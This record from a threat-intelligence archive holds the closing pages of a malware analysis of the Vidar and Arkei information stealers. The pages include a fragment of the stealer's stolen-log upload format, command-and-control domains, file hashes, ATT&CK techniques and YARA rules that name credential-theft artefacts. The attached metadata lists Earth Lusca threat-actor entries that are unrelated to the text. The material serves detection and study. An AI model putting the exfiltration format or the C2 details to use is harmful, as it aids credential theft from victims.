name=\"ccount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"fcount\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"telegram\"\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ver\"\r\n4.1\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"logs\"; filename=\"COUNTRY_.zip\"\r\nContent-Type: zip\r\nFeatures differences\r\nWhen we dig into the different features, there is some config part on Vidar that is in fact just some placebo options. in an\r\nexample, the Steam stealing feature is implemented in Arkei is not found in Vidar. This is also the same thing with Skype\r\nbut in contrary 2FA stealing stuff is only on Vidar (with what I have seen on samples in my possession).\r\nStrings only present in Arkei and not in the Vidar that I analyzed\r\nIs Arkei still active and maintained?\r\nOn one of the selling page of this stealer, it’s still sold and continue to be updated. For example, it reveals that soon a final\r\nupdate on it will be pushed (v10). So let’s see how this will turn.\r\nThe Vidar Cracked Version\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 32 of 36\n\nThere is also in the wild a cracked version that was already spotted by some people on twitter. This Vidar or “Anti-Vidar” as\r\ncalled in the source code of the panel and It’s based on an early Vidar build (v2.3 it seems).\r\nLogin\r\nThe login is identical to the Android Lokibot panel (thanks to @siri_urz). As always when confronted at this kind of stuff,\r\nthe code never lies (or it seems) for helping us to identify what is the real C2/Malware.\r\nProfile code\r\nThe profile is far more simple than the nowadays panels and samples, the default profile is hardcoded on the PHP file, and\r\nwill get it if the value is 11.\r\nIoCs\r\nSHA256 Hashes\r\n3A20466CC8C07638B8882CCC9B14C08F605F700F03D388CF85B2E76C51D64D65\r\n0E982A02D754588D4EE99F30084B886B665FF04A1460D45C4FD410B04B10A8AF\r\n2679FA8E9FD0C1F6F26527D53759BB596FDA43A741B4DFCC99A8C0907836A835\r\n9EC586B07961E0C93C830DD1C47598FE21277432F11809A4B73DF7370CDD2E29\r\n42C6950CA57D8805C217E3334158DAB4CC71A50C94D77F608B1C442BFD2B01CA\r\nD71F81EDF8AC04639D3B7C80AA178DF95C2CBFE73F81E931448A475FB771267A\r\nDAD5FCEAB002791DD6FD575782C173F1A39E0E7CE36E6DE1BAEFA95D0A8FB889\r\n66162E69CA30A75E0DD1A6FBB9028FCFBE67B4ADE8E844E7C9FF2DCB46D993D8\r\nEFF272B93FAA1C8C403EA579574F8675AB127C63ED21DB3900F8AB4FE4EC6DA9\r\nEDBAC320C42DE77C184D30A69E119D27AE3CA7D368F802D2F8F1DA3B8D01D6DD\r\nB1D5B79D13F95A516ABBCC486841C8659984E5135F1D9C74343DCCD4390C3475\r\n543AEE5A5435C77A8DE01433079F6381ADB4110F5EF4350E9A1A56B98FE40292\r\n65B2BD17E452409397E2BD6F8E95FE8B708347D80074861698E4683BD12437A9\r\n47E89F2C76D018D4952D421C5F1D603716B10E1712266DA32F63082F042F9C46\r\n5D37323DA22C5414F6E03E06EFD184D7837D598C5E395E83C1BF248A7DE57155\r\n5C0AF9C605AFD72BEF7CE8184BCCC9578EDB3A17498ACEBB74D02EB4AF0A6D2E\r\n65287763245FDD8B56BB72298C78FEA62405BD35794A06AFBBE23CC5D38BE90A\r\n20E92C2BF75C473B745617932F8DC0F8051BFC2F91BB938B2CC1CD808EBBC675\r\nC752B68F3694B2FAAB117BCBA36C156514047B75151BBBFE62764C85CEF8ADE5\r\nAE2EBF5B5813F92B0F7D6FCBADFA6E340646E4A776163AE86905E735A4B895A0\r\n8F73E9C44C86D2BBADC545CED244F38472C5AACE0F75F57C8FC2398CE0A7F5A1\r\nthx @benkow_ for the help to find some samples 🙂\r\nDomains\r\nmalansio.com\r\nnasalietco.com\r\nbinacoirel.com\r\nnewagenias.com\r\nbokolavrstos.com\r\nnaicrose.com\r\nbenderio.com\r\ncool3dmods.com\r\nMITRE ATT\u0026CK\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 33 of 36\n\nDiscovery – System Information Discovery\r\nDiscovery – System Time Discovery\r\nDiscovery – Query Registry\r\nDiscovery – Process Discovery\r\nExecution – Command-Line Interface\r\nExecution – Execution through Module Load\r\nCredential Access – Credentials in Files\r\nCollection – Screen Capture\r\nCollection – Data From Removable Media \r\nCollection – Data from Local System\r\nExfiltration – Data Compressed\r\nYara Rules\r\nVidar\r\nrule Vidar_Stealer : Vidar\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Vidar stealer\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = { 56 69 64 61 72 }\r\n $s2 = { 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 }\r\n condition:\r\n $mz at 0 and ( (all of ($s*)) )\r\n}\r\nrule Vidar_Early : Vidar\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Vidar stealer - Early versions\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = { 56 69 64 61 72 }\r\n $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }\r\n condition:\r\n $mz at 0 and all of ($hx*) and not $s1\r\n}\r\nrule AntiVidar : Vidar\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Anti Vidar - Vidar Cracked Version\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = { 56 69 64 61 72 }\r\n $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }\r\n $hx2 = { 78 61 6B 66 6F 72 2E 6E 65 74 00 }\r\n condition:\r\n $mz at 0 and all of ($hx*) and not $s1\r\n}\r\nArkei\r\n rule Arkei : Arkei\r\nrule Arkei : Arkei\r\n{\r\n meta:\r\n Author = \"Fumik0_\"\r\n Description = \"Rule to detect Arkei\"\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 34 of 36\n\nDate = \"2018/12/11\"\r\n strings:\r\n $mz = { 4D 5A }\r\n $s1 = \"Arkei\" wide ascii\r\n $s2 = \"/server/gate\" wide ascii\r\n $s3 = \"/server/grubConfig\" wide ascii\r\n $s4 = \"\\\\files\\\\\" wide ascii\r\n $s5 = \"SQLite\" wide ascii\r\n $x1 = \"/c taskkill /im\" wide ascii\r\n $x2 = \"screenshot.jpg\" wide ascii\r\n $x3 = \"files\\\\passwords.txt\" wide ascii\r\n $x4 = \"http://ip-api.com/line/\" wide ascii\r\n $x5 = \"[Hardware]\" wide ascii\r\n $x6 = \"[Network]\" wide ascii\r\n $x7 = \"[Processes]\" wide ascii\r\n $hx1 = { 56 00 69 00 64 00 61 00 72 00 2E 00 63 00 70 00 70 00 }\r\n condition:\r\n $mz at 0 and\r\n ( (all of ($s*)) or ((all of ($x*)) and not $hx1))\r\n}\r\nGithub\r\nExtract Vidar Config\r\nProfiles dumped\r\nRecommendations\r\nThis is, as usual, the same thing that I said about my precedent blog post.\r\nAlways running stuff inside a VM, be sure to install a lot of stuff linked to the hypervisor (like Guest Addons tools) \r\nto trigger as much as possible all kind of possible Anti-VM detection and closing malware.\r\nWhen you have done with your activities stop the VM and restore it with a Specific clean snapshot.\r\nAvoid storing files at a pre-destined path (Desktop, Documents, Downloads), put at a place that is not common.\r\nDon’t be stupid to click on cracks on youtube, hack software for popular games, or “wonderful” easy cash money\r\n(like Free Bitcoin Program /facepalm).\r\nFlush your browser after each visit, never saved your passwords directly on your browser or using auto-fill features.\r\nDon’t use the same password for all your websites (use 2FA and it’s possible).\r\nConclusion\r\nThis analysis was a kind of a mystery game. It’s hard to understand if Vidar is an evolution of Arkei or a forked malware\r\nbased on his code. As far it seems this is currently an active one and growing up. A lot of updates are pushed on it regularly\r\nprobably due because this is a young (forked/copycat) malware. With the fact, that this stealer was also using the skin theme\r\nof Android Lokibot (due to the cracked version), this could really lose some minds for identifying what is the correct name\r\nof the C2, without any samples to analyze. For now, let’s see with the time if we will more answers to put the puzzle\r\ntogether for this stealer. ¯\\_(ツ)_/¯\r\nOn my side, if I could sum up this year. I have done way more things than I could imagine because 2018 was a really\r\n“reaaalllyyyy” thought year, with a lot of problems and huge issues. Let’s see how this next year will be. But now, it’s time\r\nto rest and eat because there were so many sleep hours destroy and skip meals this year for learning stuff.\r\nSpecial thanks to my buddies (they will know who they are), you are the best \u003c3\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 35 of 36\n\n#HappyHunting\r\n#SeeYouIn2019\r\nSource: https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nhttps://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/\r\nPage 36 of 36",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/"
	],
	"report_names": [
		"lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434569,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c.pdf",
		"text": "https://archive.orkl.eu/e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c.txt",
		"img": "https://archive.orkl.eu/e31b1c0e40564c90b26bfdbcab36d5abf32b9a7c.jpg"
	}
}